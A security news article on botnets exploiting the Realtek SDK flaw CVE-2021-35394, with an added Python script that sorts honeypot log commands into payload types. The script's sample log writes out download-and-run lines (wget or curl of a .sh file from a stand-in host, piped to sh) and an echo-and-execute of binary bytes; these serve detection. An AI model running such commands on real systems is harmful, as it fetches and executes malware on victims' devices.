Malware exploited Realtek SDK critical bug in millions of attacks


    Between August and October of last year, specialists from Palo Alto Networks observed a surge in exploitation of the CVE-2021-35394 vulnerability, with several hacker groups exploiting it at once. It accounted for more than 40% of the total number of incidents. The vulnerability carries a severity rating of 9.8 out of 10.

    In September 2022, a major new botnet malware called "RedGoBot" emerged, targeting Internet of Things (IoT) devices vulnerable to CVE-2021-35394.

    Unit 42 researchers noticed that exploitation of the vulnerability continued throughout December. As a result of these attacks, three different payloads were delivered to the victims:

    • a script that performs command-line operations on the target server to download malware;
    • an embedded command that writes a binary payload to a file and executes it;
    • an embedded command that restarts the server.
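As an added example (not part of the original article or of the Unit 42 report it summarizes), the following Python script classifies decoded command strings from a constructed honeypot-style log into the three payload types listed above: a downloader script, an embedded write-and-execute of a binary, and a reboot. The log lines, the `.invalid` hostnames and the TEST-NET addresses are all constructed; the regular expressions are generic heuristics for those three behaviours, not signatures tied to the Realtek SDK protocol.

```python
import re
from typing import Optional

# Constructed sample log (not real traffic): one decoded command per line in a
# honeypot/IDS-style export with a timestamp, a src= field and a cmd= field.
# Hostnames use the reserved .invalid TLD and addresses come from TEST-NET ranges.
SAMPLE_LOG = r'''
2022-09-01T10:00:01Z src=203.0.113.5 cmd="cd /tmp; wget http://example.invalid/bot.sh; chmod +x bot.sh; sh bot.sh"
2022-09-01T10:00:02Z src=203.0.113.6 cmd="echo -ne '\x7f\x45\x4c\x46\x01' > /tmp/.x; chmod 777 /tmp/.x; /tmp/.x"
2022-09-01T10:00:03Z src=203.0.113.7 cmd="/sbin/reboot"
2022-09-01T10:00:04Z src=198.51.100.9 cmd="ls -la /tmp"
2022-09-01T10:00:05Z src=203.0.113.8 cmd="curl -s http://example.invalid/x.sh | sh"
'''

LINE_RE = re.compile(r'^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+cmd="(?P<cmd>.*)"$')

# Payload type 1: a downloader that fetches something and hands it to a shell.
DOWNLOAD_RE = re.compile(r'\b(wget|curl|tftp|ftpget)\b.*\b(sh|bash|chmod)\b')
# Payload type 2: an echo of escaped bytes redirected into a file (a binary written in place).
WRITE_BYTES_RE = re.compile(r'\becho\b[^>]*(\\x[0-9a-fA-F]{2}){2,}[^>]*>\s*(?P<path>[^\s;|&]+)')
# Payload type 3: a reboot issued as its own command.
REBOOT_RE = re.compile(r'(^|[;|&\s])(/sbin/)?reboot\b')


def classify(cmd: str) -> Optional[str]:
    """Map one decoded command string to the payload type it most resembles."""
    m = WRITE_BYTES_RE.search(cmd)
    if m:
        path = m.group('path')
        # A byte write alone is suspicious; a write followed by chmod or by a
        # second reference to the same path is the write-and-execute pattern.
        if re.search(r'\bchmod\b', cmd) or cmd.count(path) >= 2:
            return "write_and_execute"
    if DOWNLOAD_RE.search(cmd):
        return "download_script"
    if REBOOT_RE.search(cmd):
        return "reboot"
    return None


def scan_log(text: str) -> list:
    """Return one hit per log line whose command matches a payload type."""
    hits = []
    for n, line in enumerate(text.strip().splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these separately
        kind = classify(m.group('cmd'))
        if kind:
            hits.append({"line": n, "src": m.group('src'), "type": kind})
    return hits


def count_by_type(hits: list) -> dict:
    """Tally hits per payload type, e.g. to feed a dashboard or alert threshold."""
    counts = {}
    for h in hits:
        counts[h["type"]] = counts.get(h["type"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"line {h['line']}: {h['src']} -> {h['type']}")
    print(count_by_type(found))
```

The ordering in `classify` matters: a write-and-execute payload often also contains `chmod`, so it is tested before the downloader rule, and a plain `echo ... > file` without escaped bytes is deliberately left unclassified to keep the false-positive rate down on benign administrative commands.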

    Most of these attacks originate from botnet malware families such as Mirai, Gafgyt, Mozi and their derivatives. In April 2022, the Fodcha botnet was seen exploiting CVE-2021-35394 to carry out DDoS attacks.

    RedGoBot also exploited the vulnerability in September to carry out DDoS attacks. The botnet can perform DDoS attacks over HTTP, ICMP, TCP, UDP, VSE, and OpenVPN protocols and supports various flooding methods.

    Specialists from Unit 42 recorded activity using CVE-2021-35394 from all over the world, but almost half of the attacks came from the United States. It is possible that the hackers used VPNs or proxy servers to hide the actual source of the attack.

    “From August 2021 to December 2022, we observed a total of 134 million hack attempts targeting CVE-2021-35394, with 97% of these attacks occurring after the start of August 2022. More than 30 countries were involved as the source of the attack, with the United States being the largest source of attacks at 48.3% of the total. Vietnam, Russia, the Netherlands, France, Luxembourg and Germany were also among the top seven countries from which, according to our observations, attackers took part in these attacks,” the Unit 42 report says.

    CVE-2021-35394 is a critical vulnerability in Realtek Jungle SDK versions 2.x through 3.4.14B, caused by multiple memory corruptions that allow unauthenticated remote attackers to perform arbitrary command injection.

    Realtek chipsets are ubiquitous in the IoT world, and even as the Taiwanese chipmaker releases security updates to quickly fix problems in its products, supply chain complexities delay their delivery to end users.

    Realtek closed the vulnerability as early as August 15, 2021; however, many users of IoT devices run them on a “set it and forget it” basis and do not update the firmware to the latest version in a timely manner.

    The spike in exploitation of CVE-2021-35394 nearly a year after Realtek released security patches indicates that both hardware manufacturers and end users are at fault. It is possible that some affected devices are no longer supported by their manufacturers, which have not released an update for them at all. In other cases an update with a fix may have been released, but users either could not or did not install it.

    If your device has already been infected, it is recommended that you perform a factory reset, set a strong administrator password, and then apply any available firmware updates.

    CVE-2021-35394 is expected to remain actively exploited in the first half of 2023 because of the difficulties in delivering fixes through the supply chain to devices.

    Author DeepWeb